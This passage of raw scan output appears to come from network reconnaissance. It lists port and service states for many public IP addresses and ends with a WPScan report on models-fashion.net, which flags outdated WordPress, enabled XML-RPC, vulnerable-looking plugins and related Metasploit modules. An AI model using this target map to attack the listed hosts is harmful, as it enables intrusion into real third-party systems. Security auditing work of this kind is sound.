321923.62.115.113 162 tcp snmptrap filtered
322023.62.115.113 162 udp snmptrap unknown
322123.62.115.113 389 tcp ldap filtered
322223.62.115.113 389 udp ldap unknown
322323.62.115.113 443 tcp ssl/http open AkamaiGHost Akamai's HTTP Acceleration/Mirror service
322423.62.115.113 520 tcp efs filtered
322523.62.115.113 520 udp route unknown
322623.62.115.113 2049 tcp nfs filtered
322723.62.115.113 2049 udp nfs unknown
322823.62.121.49 53 tcp domain filtered
322923.62.121.49 53 udp domain unknown
323023.62.121.49 67 tcp dhcps filtered
323123.62.121.49 67 udp dhcps unknown
323223.62.121.49 68 tcp dhcpc filtered
323323.62.121.49 68 udp dhcpc unknown
323423.62.121.49 69 tcp tftp filtered
323523.62.121.49 69 udp tftp unknown
323623.62.121.49 80 tcp http open AkamaiGHost Akamai's HTTP Acceleration/Mirror service
323723.62.121.49 88 tcp kerberos-sec filtered
323823.62.121.49 88 udp kerberos-sec unknown
323923.62.121.49 123 tcp ntp filtered
324023.62.121.49 123 udp ntp unknown
324123.62.121.49 137 tcp netbios-ns filtered
324223.62.121.49 137 udp netbios-ns unknown
324323.62.121.49 138 tcp netbios-dgm filtered
324423.62.121.49 138 udp netbios-dgm unknown
324523.62.121.49 139 tcp netbios-ssn filtered
324623.62.121.49 139 udp netbios-ssn unknown
324723.62.121.49 161 tcp snmp filtered
324823.62.121.49 161 udp snmp unknown
324923.62.121.49 162 tcp snmptrap filtered
325023.62.121.49 162 udp snmptrap unknown
325123.62.121.49 389 tcp ldap filtered
325223.62.121.49 389 udp ldap unknown
325323.62.121.49 443 tcp ssl/http open AkamaiGHost Akamai's HTTP Acceleration/Mirror service
325423.62.121.49 520 tcp efs filtered
325523.62.121.49 520 udp route unknown
325623.62.121.49 2049 tcp nfs filtered
325723.62.121.49 2049 udp nfs unknown
325823.100.15.180 53 tcp domain filtered
325923.100.15.180 53 udp domain unknown
326023.100.15.180 67 tcp dhcps filtered
326123.100.15.180 67 udp dhcps unknown
326223.100.15.180 68 tcp dhcpc filtered
326323.100.15.180 68 udp dhcpc unknown
326423.100.15.180 69 tcp tftp filtered
326523.100.15.180 69 udp tftp unknown
326623.100.15.180 88 tcp kerberos-sec filtered
326723.100.15.180 88 udp kerberos-sec unknown
326823.100.15.180 123 tcp ntp filtered
326923.100.15.180 123 udp ntp unknown
327023.100.15.180 137 tcp netbios-ns filtered
327123.100.15.180 137 udp netbios-ns unknown
327223.100.15.180 138 tcp netbios-dgm filtered
327323.100.15.180 138 udp netbios-dgm unknown
327423.100.15.180 139 tcp netbios-ssn filtered
327523.100.15.180 139 udp netbios-ssn unknown
327623.100.15.180 161 tcp snmp filtered
327723.100.15.180 161 udp snmp unknown
327823.100.15.180 162 tcp snmptrap filtered
327923.100.15.180 162 udp snmptrap unknown
328023.100.15.180 389 tcp ldap filtered
328123.100.15.180 389 udp ldap unknown
328223.100.15.180 520 tcp efs filtered
328323.100.15.180 520 udp route unknown
328423.100.15.180 2049 tcp nfs filtered
328523.100.15.180 2049 udp nfs unknown
328652.52.234.222 53 tcp domain filtered
328752.52.234.222 53 udp domain unknown
328852.52.234.222 67 tcp dhcps filtered
328952.52.234.222 67 udp dhcps unknown
329052.52.234.222 68 tcp dhcpc filtered
329152.52.234.222 68 udp dhcpc unknown
329252.52.234.222 69 tcp tftp filtered
329352.52.234.222 69 udp tftp unknown
329452.52.234.222 80 tcp http open Apache httpd 2.2.34
329552.52.234.222 88 tcp kerberos-sec filtered
329652.52.234.222 88 udp kerberos-sec unknown
329752.52.234.222 123 tcp ntp filtered
329852.52.234.222 123 udp ntp unknown
329952.52.234.222 137 tcp netbios-ns filtered
330052.52.234.222 137 udp netbios-ns unknown
330152.52.234.222 138 tcp netbios-dgm filtered
330252.52.234.222 138 udp netbios-dgm unknown
330352.52.234.222 139 tcp netbios-ssn filtered
330452.52.234.222 139 udp netbios-ssn unknown
330552.52.234.222 161 tcp snmp filtered
330652.52.234.222 161 udp snmp unknown
330752.52.234.222 162 tcp snmptrap filtered
330852.52.234.222 162 udp snmptrap unknown
330952.52.234.222 389 tcp ldap filtered
331052.52.234.222 389 udp ldap unknown
331152.52.234.222 443 tcp ssl/http open Apache Tomcat/Coyote JSP engine 1.1
331252.52.234.222 520 tcp efs filtered
331352.52.234.222 520 udp route unknown
331452.52.234.222 2049 tcp nfs filtered
331552.52.234.222 2049 udp nfs unknown
331680.169.89.102 53 tcp domain filtered
331780.169.89.102 53 udp domain unknown
331880.169.89.102 67 tcp dhcps filtered
331980.169.89.102 67 udp dhcps unknown
332080.169.89.102 68 tcp dhcpc filtered
332180.169.89.102 68 udp dhcpc unknown
332280.169.89.102 69 tcp tftp filtered
332380.169.89.102 69 udp tftp unknown
332480.169.89.102 80 tcp http open COL-VMW-M-LB02
332580.169.89.102 88 tcp kerberos-sec filtered
332680.169.89.102 88 udp kerberos-sec unknown
332780.169.89.102 123 tcp ntp filtered
332880.169.89.102 123 udp ntp unknown
332980.169.89.102 137 tcp netbios-ns filtered
333080.169.89.102 137 udp netbios-ns unknown
333180.169.89.102 138 tcp netbios-dgm filtered
333280.169.89.102 138 udp netbios-dgm unknown
333380.169.89.102 139 tcp netbios-ssn filtered
333480.169.89.102 139 udp netbios-ssn unknown
333580.169.89.102 161 tcp snmp filtered
333680.169.89.102 161 udp snmp unknown
333780.169.89.102 162 tcp snmptrap filtered
333880.169.89.102 162 udp snmptrap unknown
333980.169.89.102 389 tcp ldap filtered
334080.169.89.102 389 udp ldap unknown
334180.169.89.102 443 tcp ssl/http open Microsoft IIS httpd 7.5
334280.169.89.102 520 tcp efs filtered
334380.169.89.102 520 udp route unknown
334480.169.89.102 2049 tcp nfs filtered
334580.169.89.102 2049 udp nfs unknown
334691.211.89.189 53 tcp domain closed
334791.211.89.189 53 udp domain closed
334891.211.89.189 67 tcp dhcps filtered
334991.211.89.189 67 udp dhcps closed
335091.211.89.189 68 tcp dhcpc closed
335191.211.89.189 68 udp dhcpc unknown
335291.211.89.189 69 tcp tftp closed
335391.211.89.189 69 udp tftp closed
335491.211.89.189 88 tcp kerberos-sec filtered
335591.211.89.189 88 udp kerberos-sec closed
335691.211.89.189 123 tcp ntp closed
335791.211.89.189 123 udp ntp closed
335891.211.89.189 137 tcp netbios-ns closed
335991.211.89.189 137 udp netbios-ns closed
336091.211.89.189 138 tcp netbios-dgm closed
336191.211.89.189 138 udp netbios-dgm unknown
336291.211.89.189 139 tcp netbios-ssn filtered
336391.211.89.189 139 udp netbios-ssn unknown
336491.211.89.189 161 tcp snmp filtered
336591.211.89.189 161 udp snmp unknown
336691.211.89.189 162 tcp snmptrap closed
336791.211.89.189 162 udp snmptrap closed
336891.211.89.189 389 tcp ldap closed
336991.211.89.189 389 udp ldap closed
337091.211.89.189 520 tcp efs filtered
337191.211.89.189 520 udp route unknown
337291.211.89.189 2049 tcp nfs closed
337391.211.89.189 2049 udp nfs closed
337493.174.93.84 53 tcp domain filtered
337593.174.93.84 53 udp domain unknown
337693.174.93.84 67 tcp dhcps filtered
337793.174.93.84 67 udp dhcps unknown
337893.174.93.84 68 tcp dhcpc filtered
337993.174.93.84 68 udp dhcpc unknown
338093.174.93.84 69 tcp tftp filtered
338193.174.93.84 69 udp tftp unknown
338293.174.93.84 80 tcp http open Apache httpd 2.4.6 (CentOS) PHP/5.4.16
338393.174.93.84 88 tcp kerberos-sec filtered
338493.174.93.84 88 udp kerberos-sec unknown
338593.174.93.84 123 tcp ntp filtered
338693.174.93.84 123 udp ntp filtered
338793.174.93.84 137 tcp netbios-ns filtered
338893.174.93.84 137 udp netbios-ns unknown
338993.174.93.84 138 tcp netbios-dgm filtered
339093.174.93.84 138 udp netbios-dgm filtered
339193.174.93.84 139 tcp netbios-ssn filtered
339293.174.93.84 139 udp netbios-ssn filtered
339393.174.93.84 161 tcp snmp filtered
339493.174.93.84 161 udp snmp unknown
339593.174.93.84 162 tcp snmptrap filtered
339693.174.93.84 162 udp snmptrap filtered
339793.174.93.84 389 tcp ldap filtered
339893.174.93.84 389 udp ldap unknown
339993.174.93.84 520 tcp efs filtered
340093.174.93.84 520 udp route unknown
340193.174.93.84 2049 tcp nfs filtered
340293.174.93.84 2049 udp nfs unknown
340393.174.93.84 3030 tcp http-proxy open tinyproxy 1.8.3
340494.140.114.104 22 tcp ssh open OpenSSH 7.4 protocol 2.0
340594.140.114.104 53 tcp domain closed
340694.140.114.104 53 udp domain closed
340794.140.114.104 67 tcp dhcps closed
340894.140.114.104 67 udp dhcps unknown
340994.140.114.104 68 tcp dhcpc closed
341094.140.114.104 68 udp dhcpc unknown
341194.140.114.104 69 tcp tftp closed
341294.140.114.104 69 udp tftp closed
341394.140.114.104 80 tcp http open nginx 1.16.1
341494.140.114.104 88 tcp kerberos-sec closed
341594.140.114.104 88 udp kerberos-sec closed
341694.140.114.104 111 tcp rpcbind open 2-4 RPC #100000
341794.140.114.104 123 tcp ntp closed
341894.140.114.104 123 udp ntp unknown
341994.140.114.104 135 tcp msrpc filtered
342094.140.114.104 137 tcp netbios-ns filtered
342194.140.114.104 137 udp netbios-ns unknown
342294.140.114.104 138 tcp netbios-dgm filtered
342394.140.114.104 138 udp netbios-dgm unknown
342494.140.114.104 139 tcp netbios-ssn closed
342594.140.114.104 139 udp netbios-ssn closed
342694.140.114.104 161 tcp snmp closed
342794.140.114.104 161 udp snmp closed
342894.140.114.104 162 tcp snmptrap closed
342994.140.114.104 162 udp snmptrap unknown
343094.140.114.104 389 tcp ldap closed
343194.140.114.104 389 udp ldap unknown
343294.140.114.104 520 tcp efs closed
343394.140.114.104 520 udp route closed
343494.140.114.104 2049 tcp nfs closed
343594.140.114.104 2049 udp nfs unknown
3436104.87.36.73 53 tcp domain filtered
3437104.87.36.73 53 udp domain unknown
3438104.87.36.73 67 tcp dhcps filtered
3439104.87.36.73 67 udp dhcps unknown
3440104.87.36.73 68 tcp dhcpc filtered
3441104.87.36.73 68 udp dhcpc unknown
3442104.87.36.73 69 tcp tftp filtered
3443104.87.36.73 69 udp tftp unknown
3444104.87.36.73 88 tcp kerberos-sec filtered
3445104.87.36.73 88 udp kerberos-sec unknown
3446104.87.36.73 123 tcp ntp filtered
3447104.87.36.73 123 udp ntp unknown
3448104.87.36.73 137 tcp netbios-ns filtered
3449104.87.36.73 137 udp netbios-ns unknown
3450104.87.36.73 138 tcp netbios-dgm filtered
3451104.87.36.73 138 udp netbios-dgm unknown
3452104.87.36.73 139 tcp netbios-ssn filtered
3453104.87.36.73 139 udp netbios-ssn unknown
3454104.87.36.73 161 tcp snmp filtered
3455104.87.36.73 161 udp snmp unknown
3456104.87.36.73 162 tcp snmptrap filtered
3457104.87.36.73 162 udp snmptrap unknown
3458104.87.36.73 389 tcp ldap filtered
3459104.87.36.73 389 udp ldap unknown
3460104.87.36.73 520 tcp efs filtered
3461104.87.36.73 520 udp route unknown
3462104.87.36.73 2049 tcp nfs filtered
3463104.87.36.73 2049 udp nfs unknown
3464155.136.13.18 53 tcp domain filtered
3465155.136.13.18 53 udp domain unknown
3466155.136.13.18 67 tcp dhcps filtered
3467155.136.13.18 67 udp dhcps unknown
3468155.136.13.18 68 tcp dhcpc filtered
3469155.136.13.18 68 udp dhcpc unknown
3470155.136.13.18 69 tcp tftp filtered
3471155.136.13.18 69 udp tftp unknown
3472155.136.13.18 88 tcp kerberos-sec filtered
3473155.136.13.18 88 udp kerberos-sec unknown
3474155.136.13.18 123 tcp ntp filtered
3475155.136.13.18 123 udp ntp unknown
3476155.136.13.18 137 tcp netbios-ns filtered
3477155.136.13.18 137 udp netbios-ns unknown
3478155.136.13.18 138 tcp netbios-dgm filtered
3479155.136.13.18 138 udp netbios-dgm unknown
3480155.136.13.18 139 tcp netbios-ssn filtered
3481155.136.13.18 139 udp netbios-ssn unknown
3482155.136.13.18 161 tcp snmp filtered
3483155.136.13.18 161 udp snmp unknown
3484155.136.13.18 162 tcp snmptrap filtered
3485155.136.13.18 162 udp snmptrap unknown
3486155.136.13.18 389 tcp ldap filtered
3487155.136.13.18 389 udp ldap unknown
3488155.136.13.18 520 tcp efs filtered
3489155.136.13.18 520 udp route unknown
3490155.136.13.18 2049 tcp nfs filtered
3491155.136.13.18 2049 udp nfs unknown
3492190.94.188.40 53 tcp domain filtered
3493190.94.188.40 53 udp domain unknown
3494190.94.188.40 67 tcp dhcps filtered
3495190.94.188.40 67 udp dhcps unknown
3496190.94.188.40 68 tcp dhcpc filtered
3497190.94.188.40 68 udp dhcpc unknown
3498190.94.188.40 69 tcp tftp filtered
3499190.94.188.40 69 udp tftp unknown
3500190.94.188.40 88 tcp kerberos-sec filtered
3501190.94.188.40 88 udp kerberos-sec unknown
3502190.94.188.40 123 tcp ntp filtered
3503190.94.188.40 123 udp ntp unknown
3504190.94.188.40 137 tcp netbios-ns filtered
3505190.94.188.40 137 udp netbios-ns unknown
3506190.94.188.40 138 tcp netbios-dgm filtered
3507190.94.188.40 138 udp netbios-dgm unknown
3508190.94.188.40 139 tcp netbios-ssn filtered
3509190.94.188.40 139 udp netbios-ssn unknown
3510190.94.188.40 161 tcp snmp filtered
3511190.94.188.40 161 udp snmp unknown
3512190.94.188.40 162 tcp snmptrap filtered
3513190.94.188.40 162 udp snmptrap unknown
3514190.94.188.40 389 tcp ldap filtered
3515190.94.188.40 389 udp ldap unknown
3516190.94.188.40 520 tcp efs filtered
3517190.94.188.40 520 udp route unknown
3518190.94.188.40 2049 tcp nfs filtered
3519190.94.188.40 2049 udp nfs unknown
3520190.94.188.59 53 tcp domain closed
3521190.94.188.59 53 udp domain closed
3522190.94.188.59 67 tcp dhcps filtered
3523190.94.188.59 67 udp dhcps unknown
3524190.94.188.59 68 tcp dhcpc filtered
3525190.94.188.59 68 udp dhcpc unknown
3526190.94.188.59 69 tcp tftp filtered
3527190.94.188.59 69 udp tftp unknown
3528190.94.188.59 88 tcp kerberos-sec filtered
3529190.94.188.59 88 udp kerberos-sec unknown
3530190.94.188.59 123 tcp ntp filtered
3531190.94.188.59 123 udp ntp unknown
3532190.94.188.59 137 tcp netbios-ns filtered
3533190.94.188.59 137 udp netbios-ns unknown
3534190.94.188.59 138 tcp netbios-dgm filtered
3535190.94.188.59 138 udp netbios-dgm unknown
3536190.94.188.59 139 tcp netbios-ssn filtered
3537190.94.188.59 139 udp netbios-ssn unknown
3538190.94.188.59 161 tcp snmp filtered
3539190.94.188.59 161 udp snmp unknown
3540190.94.188.59 162 tcp snmptrap filtered
3541190.94.188.59 162 udp snmptrap unknown
3542190.94.188.59 389 tcp ldap filtered
3543190.94.188.59 389 udp ldap unknown
3544190.94.188.59 520 tcp efs filtered
3545190.94.188.59 520 udp route unknown
3546190.94.188.59 2049 tcp nfs filtered
3547190.94.188.59 2049 udp nfs unknown
3548198.41.44.129 53 tcp domain filtered
3549198.41.44.129 53 udp domain unknown
3550198.41.44.129 67 tcp dhcps filtered
3551198.41.44.129 67 udp dhcps unknown
3552198.41.44.129 68 tcp dhcpc filtered
3553198.41.44.129 68 udp dhcpc unknown
3554198.41.44.129 69 tcp tftp filtered
3555198.41.44.129 69 udp tftp unknown
3556198.41.44.129 88 tcp kerberos-sec filtered
3557198.41.44.129 88 udp kerberos-sec unknown
3558198.41.44.129 123 tcp ntp filtered
3559198.41.44.129 123 udp ntp unknown
3560198.41.44.129 137 tcp netbios-ns filtered
3561198.41.44.129 137 udp netbios-ns unknown
3562198.41.44.129 138 tcp netbios-dgm filtered
3563198.41.44.129 138 udp netbios-dgm unknown
3564198.41.44.129 139 tcp netbios-ssn filtered
3565198.41.44.129 139 udp netbios-ssn unknown
3566198.41.44.129 161 tcp snmp filtered
3567198.41.44.129 161 udp snmp unknown
3568198.41.44.129 162 tcp snmptrap filtered
3569198.41.44.129 162 udp snmptrap unknown
3570198.41.44.129 389 tcp ldap filtered
3571198.41.44.129 389 udp ldap unknown
3572198.41.44.129 520 tcp efs filtered
3573198.41.44.129 520 udp route unknown
3574198.41.44.129 2049 tcp nfs filtered
3575198.41.44.129 2049 udp nfs unknown
3576201.148.104.59 21 tcp ftp open The firewall on this server is blocking your connection. You need to contact the server owner or hosting provider for further information. Your blocked IP address is: 190.105.229.22 This server's hostname is: hcenter10459.dedicados.cl \x0d\x0a
3577201.148.104.59 53 tcp domain filtered
3578201.148.104.59 53 udp domain unknown
3579201.148.104.59 67 tcp dhcps filtered
3580201.148.104.59 67 udp dhcps unknown
3581201.148.104.59 68 tcp dhcpc filtered
3582201.148.104.59 68 udp dhcpc unknown
3583201.148.104.59 69 tcp tftp filtered
3584201.148.104.59 69 udp tftp unknown
3585201.148.104.59 88 tcp kerberos-sec filtered
3586201.148.104.59 88 udp kerberos-sec unknown
3587201.148.104.59 123 tcp ntp filtered
3588201.148.104.59 123 udp ntp unknown
3589201.148.104.59 137 tcp netbios-ns filtered
3590201.148.104.59 137 udp netbios-ns unknown
3591201.148.104.59 138 tcp netbios-dgm filtered
3592201.148.104.59 138 udp netbios-dgm unknown
3593201.148.104.59 139 tcp netbios-ssn filtered
3594201.148.104.59 139 udp netbios-ssn unknown
3595201.148.104.59 161 tcp snmp filtered
3596201.148.104.59 161 udp snmp unknown
3597201.148.104.59 162 tcp snmptrap filtered
3598201.148.104.59 162 udp snmptrap unknown
3599201.148.104.59 389 tcp ldap filtered
3600201.148.104.59 389 udp ldap unknown
3601201.148.104.59 520 tcp efs filtered
3602201.148.104.59 520 udp route unknown
3603201.148.104.59 2049 tcp nfs filtered
3604201.148.104.59 2049 udp nfs unknown
3605213.183.63.253 22 tcp ssh open OpenSSH 7.4 protocol 2.0
3606213.183.63.253 53 tcp domain closed
3607213.183.63.253 53 udp domain unknown
3608213.183.63.253 67 tcp dhcps closed
3609213.183.63.253 67 udp dhcps closed
3610213.183.63.253 68 tcp dhcpc closed
3611213.183.63.253 68 udp dhcpc unknown
3612213.183.63.253 69 tcp tftp closed
3613213.183.63.253 69 udp tftp unknown
3614213.183.63.253 80 tcp http open nginx 1.16.1
3615213.183.63.253 88 tcp kerberos-sec closed
3616213.183.63.253 88 udp kerberos-sec closed
3617213.183.63.253 123 tcp ntp closed
3618213.183.63.253 123 udp ntp closed
3619213.183.63.253 135 tcp msrpc filtered
3620213.183.63.253 136 tcp profile filtered
3621213.183.63.253 137 tcp netbios-ns filtered
3622213.183.63.253 137 udp netbios-ns unknown
3623213.183.63.253 138 tcp netbios-dgm filtered
3624213.183.63.253 138 udp netbios-dgm unknown
3625213.183.63.253 139 tcp netbios-ssn filtered
3626213.183.63.253 139 udp netbios-ssn unknown
3627213.183.63.253 161 tcp snmp closed
3628213.183.63.253 161 udp snmp unknown
3629213.183.63.253 162 tcp snmptrap closed
3630213.183.63.253 162 udp snmptrap unknown
3631213.183.63.253 389 tcp ldap closed
3632213.183.63.253 389 udp ldap unknown
3633213.183.63.253 445 tcp microsoft-ds filtered
3634213.183.63.253 520 tcp efs closed
3635213.183.63.253 520 udp route closed
3636213.183.63.253 2049 tcp nfs closed
3637213.183.63.253 2049 udp nfs unknown
3638213.183.63.253 4145 tcp vvr-control filtered
3639213.183.63.253 11211 tcp memcache filtered
3640217.148.69.93 53 tcp domain filtered
3641217.148.69.93 53 udp domain unknown
3642217.148.69.93 67 tcp dhcps filtered
3643217.148.69.93 67 udp dhcps unknown
3644217.148.69.93 68 tcp dhcpc filtered
3645217.148.69.93 68 udp dhcpc unknown
3646217.148.69.93 69 tcp tftp filtered
3647217.148.69.93 69 udp tftp unknown
3648217.148.69.93 88 tcp kerberos-sec filtered
3649217.148.69.93 88 udp kerberos-sec unknown
3650217.148.69.93 123 tcp ntp filtered
3651217.148.69.93 123 udp ntp unknown
3652217.148.69.93 137 tcp netbios-ns filtered
3653217.148.69.93 137 udp netbios-ns unknown
3654217.148.69.93 138 tcp netbios-dgm filtered
3655217.148.69.93 138 udp netbios-dgm unknown
3656217.148.69.93 139 tcp netbios-ssn filtered
3657217.148.69.93 139 udp netbios-ssn unknown
3658217.148.69.93 161 tcp snmp filtered
3659217.148.69.93 161 udp snmp unknown
3660217.148.69.93 162 tcp snmptrap filtered
3661217.148.69.93 162 udp snmptrap unknown
3662217.148.69.93 389 tcp ldap filtered
3663217.148.69.93 389 udp ldap unknown
3664217.148.69.93 520 tcp efs filtered
3665217.148.69.93 520 udp route unknown
3666217.148.69.93 2049 tcp nfs filtered
3667217.148.69.93 2049 udp nfs unknown
3668217.148.69.235 53 tcp domain filtered
3669217.148.69.235 53 udp domain unknown
3670217.148.69.235 67 tcp dhcps filtered
3671217.148.69.235 67 udp dhcps unknown
3672217.148.69.235 68 tcp dhcpc filtered
3673217.148.69.235 68 udp dhcpc unknown
3674217.148.69.235 69 tcp tftp filtered
3675217.148.69.235 69 udp tftp unknown
3676217.148.69.235 88 tcp kerberos-sec filtered
3677217.148.69.235 88 udp kerberos-sec unknown
3678217.148.69.235 123 tcp ntp filtered
3679217.148.69.235 123 udp ntp unknown
3680217.148.69.235 137 tcp netbios-ns filtered
3681217.148.69.235 137 udp netbios-ns unknown
3682217.148.69.235 138 tcp netbios-dgm filtered
3683217.148.69.235 138 udp netbios-dgm unknown
3684217.148.69.235 139 tcp netbios-ssn filtered
3685217.148.69.235 139 udp netbios-ssn unknown
3686217.148.69.235 161 tcp snmp filtered
3687217.148.69.235 161 udp snmp unknown
3688217.148.69.235 162 tcp snmptrap filtered
3689217.148.69.235 162 udp snmptrap unknown
3690217.148.69.235 389 tcp ldap filtered
3691217.148.69.235 389 udp ldap unknown
3692217.148.69.235 520 tcp efs filtered
3693217.148.69.235 520 udp route unknown
3694217.148.69.235 2049 tcp nfs filtered
3695217.148.69.235 2049 udp nfs unknown
3696217.148.71.93 53 tcp domain filtered
3697217.148.71.93 53 udp domain unknown
3698217.148.71.93 67 tcp dhcps filtered
3699217.148.71.93 67 udp dhcps unknown
3700217.148.71.93 68 tcp dhcpc filtered
3701217.148.71.93 68 udp dhcpc unknown
3702217.148.71.93 69 tcp tftp filtered
3703217.148.71.93 69 udp tftp unknown
3704217.148.71.93 88 tcp kerberos-sec filtered
3705217.148.71.93 88 udp kerberos-sec unknown
3706217.148.71.93 123 tcp ntp filtered
3707217.148.71.93 123 udp ntp unknown
3708217.148.71.93 137 tcp netbios-ns filtered
3709217.148.71.93 137 udp netbios-ns unknown
3710217.148.71.93 138 tcp netbios-dgm filtered
3711217.148.71.93 138 udp netbios-dgm unknown
3712217.148.71.93 139 tcp netbios-ssn filtered
3713217.148.71.93 139 udp netbios-ssn unknown
3714217.148.71.93 161 tcp snmp filtered
3715217.148.71.93 161 udp snmp unknown
3716217.148.71.93 162 tcp snmptrap filtered
3717217.148.71.93 162 udp snmptrap unknown
3718217.148.71.93 389 tcp ldap filtered
3719217.148.71.93 389 udp ldap unknown
3720217.148.71.93 520 tcp efs filtered
3721217.148.71.93 520 udp route unknown
3722217.148.71.93 2049 tcp nfs filtered
3723217.148.71.93 2049 udp nfs unknown
3724217.148.71.235 53 tcp domain filtered
3725217.148.71.235 53 udp domain unknown
3726217.148.71.235 67 tcp dhcps filtered
3727217.148.71.235 67 udp dhcps unknown
3728217.148.71.235 68 tcp dhcpc filtered
3729217.148.71.235 68 udp dhcpc unknown
3730217.148.71.235 69 tcp tftp filtered
3731217.148.71.235 69 udp tftp unknown
3732217.148.71.235 88 tcp kerberos-sec filtered
3733217.148.71.235 88 udp kerberos-sec unknown
3734217.148.71.235 123 tcp ntp filtered
3735217.148.71.235 123 udp ntp unknown
3736217.148.71.235 137 tcp netbios-ns filtered
3737217.148.71.235 137 udp netbios-ns unknown
3738217.148.71.235 138 tcp netbios-dgm filtered
3739217.148.71.235 138 udp netbios-dgm unknown
3740217.148.71.235 139 tcp netbios-ssn filtered
3741217.148.71.235 139 udp netbios-ssn unknown
3742217.148.71.235 161 tcp snmp filtered
3743217.148.71.235 161 udp snmp unknown
3744217.148.71.235 162 tcp snmptrap filtered
3745217.148.71.235 162 udp snmptrap unknown
3746217.148.71.235 389 tcp ldap filtered
3747217.148.71.235 389 udp ldap unknown
3748217.148.71.235 520 tcp efs filtered
3749217.148.71.235 520 udp route unknown
3750217.148.71.235 2049 tcp nfs filtered
3751217.148.71.235 2049 udp nfs unknown
3752#####################################################################################################################
3753[+] URL: http://models-fashion.net/ [213.183.63.253]
3754[+] Started: Tue Mar 31 17:47:52 2020
3755
3756Interesting Finding(s):
3757
3758[+] Headers
3759 | Interesting Entries:
3760 | - Server: nginx/1.16.1
3761 | - Upgrade: h2,h2c
3762 | - X-Powered-By: PHP/5.4.45
3763 | Found By: Headers (Passive Detection)
3764 | Confidence: 100%
3765
3766[+] http://models-fashion.net/robots.txt
3767 | Interesting Entries:
3768 | - /wp-admin/
3769 | - /wp-admin/admin-ajax.php
3770 | Found By: Robots Txt (Aggressive Detection)
3771 | Confidence: 100%
3772
3773[+] XML-RPC seems to be enabled: http://models-fashion.net/xmlrpc.php
3774 | Found By: Link Tag (Passive Detection)
3775 | Confidence: 100%
3776 | Confirmed By: Direct Access (Aggressive Detection), 100% confidence
3777 | References:
3778 | - http://codex.wordpress.org/XML-RPC_Pingback_API
3779 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
3780 | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
3781 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
3782 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
3783
3784[+] http://models-fashion.net/readme.html
3785 | Found By: Direct Access (Aggressive Detection)
3786 | Confidence: 100%
3787
3788[+] The external WP-Cron seems to be enabled: http://models-fashion.net/wp-cron.php
3789 | Found By: Direct Access (Aggressive Detection)
3790 | Confidence: 60%
3791 | References:
3792 | - https://www.iplocation.net/defend-wordpress-from-ddos
3793 | - https://github.com/wpscanteam/wpscan/issues/1299
3794
3795[+] WordPress version 4.5.9 identified (Insecure, released on 2017-05-16).
3796 | Found By: Rss Generator (Passive Detection)
3797 | - http://models-fashion.net/comments/feed/, <generator>https://wordpress.org/?v=4.5.9</generator>
3798 | Confirmed By: Emoji Settings (Passive Detection)
3799 | - http://models-fashion.net/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.5.9'
3800
3801[+] WordPress theme in use: sorbet
3802 | Location: http://models-fashion.net/wp-content/themes/sorbet/
3803 | Latest Version: 1.2.3 (up to date)
3804 | Last Updated: 2017-06-08T00:00:00.000Z
3805 | Readme: http://models-fashion.net/wp-content/themes/sorbet/readme.txt
3806 | Style URL: http://models-fashion.net/wp-content/themes/sorbet/style.css?ver=4.5.9
3807 | Style Name: Sorbet
3808 | Style URI: http://theme.wordpress.com/themes/sorbet/
3809 | Description: Sorbet is a delicious treat for your blog or website. Colorful post formats help your content pop, w...
3810 | Author: Automattic
3811 | Author URI: http://automattic.com
3812 |
3813 | Found By: Css Style In Homepage (Passive Detection)
3814 | Confirmed By: Css Style In 404 Page (Passive Detection)
3815 |
3816 | Version: 10.3 (80% confidence)
3817 | Found By: Style (Passive Detection)
3818 | - http://models-fashion.net/wp-content/themes/sorbet/style.css?ver=4.5.9, Match: 'Version: 10.3'
3819
3820[+] Enumerating All Plugins (via Passive Methods)
3821[+] Checking Plugin Versions (via Passive and Aggressive Methods)
3822
3823[i] Plugin(s) Identified:
3824
3825[+] add-to-any
3826 | Location: http://models-fashion.net/wp-content/plugins/add-to-any/
3827 | Last Updated: 2019-10-16T05:09:00.000Z
3828 | [!] The version is out of date, the latest version is 1.7.39
3829 |
3830 | Found By: Urls In Homepage (Passive Detection)
3831 | Confirmed By: Urls In 404 Page (Passive Detection)
3832 |
3833 | Version: 1.3.8.1 (80% confidence)
3834 | Found By: Readme - Stable Tag (Aggressive Detection)
3835 | - http://models-fashion.net/wp-content/plugins/add-to-any/README.txt
3836
3837[+] all-in-one-seo-pack
3838 | Location: http://models-fashion.net/wp-content/plugins/all-in-one-seo-pack/
3839 | Last Updated: 2020-02-07T20:36:00.000Z
3840 | [!] The version is out of date, the latest version is 3.3.5
3841 |
3842 | Found By: Comment (Passive Detection)
3843 |
3844 | Version: 2.2.3.1 (60% confidence)
3845 | Found By: Comment (Passive Detection)
3846 | - http://models-fashion.net/, Match: 'All in One SEO Pack 2.2.3.1 by'
3847
3848[+] wp-pagenavi
3849 | Location: http://models-fashion.net/wp-content/plugins/wp-pagenavi/
3850 | Last Updated: 2020-03-29T04:29:00.000Z
3851 | [!] The version is out of date, the latest version is 2.93.3
3852 |
3853 | Found By: Urls In Homepage (Passive Detection)
3854 | Confirmed By: Urls In 404 Page (Passive Detection)
3855 |
3856 | Version: 2.86 (100% confidence)
3857 | Found By: Readme - Stable Tag (Aggressive Detection)
3858 | - http://models-fashion.net/wp-content/plugins/wp-pagenavi/readme.txt
3859 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
3860 | - http://models-fashion.net/wp-content/plugins/wp-pagenavi/readme.txt
3861
3862[+] wp-spamshield
3863 | Location: http://models-fashion.net/wp-content/plugins/wp-spamshield/
3864 | Last Updated: 2017-10-28T01:08:00.000Z
3865 | [!] The version is out of date, the latest version is 1.9.21
3866 |
3867 | Found By: Urls In Homepage (Passive Detection)
3868 | Confirmed By: Urls In 404 Page (Passive Detection)
3869 |
3870 | Version: 1.5.5 (50% confidence)
3871 | Found By: Readme - ChangeLog Section (Aggressive Detection)
3872 | - http://models-fashion.net/wp-content/plugins/wp-spamshield/readme.txt
3873
3874[+] yet-another-related-posts-plugin
3875 | Location: http://models-fashion.net/wp-content/plugins/yet-another-related-posts-plugin/
3876 | Last Updated: 2019-11-06T18:54:00.000Z
3877 | [!] The version is out of date, the latest version is 5.1.2
3878 |
3879 | Found By: Urls In Homepage (Passive Detection)
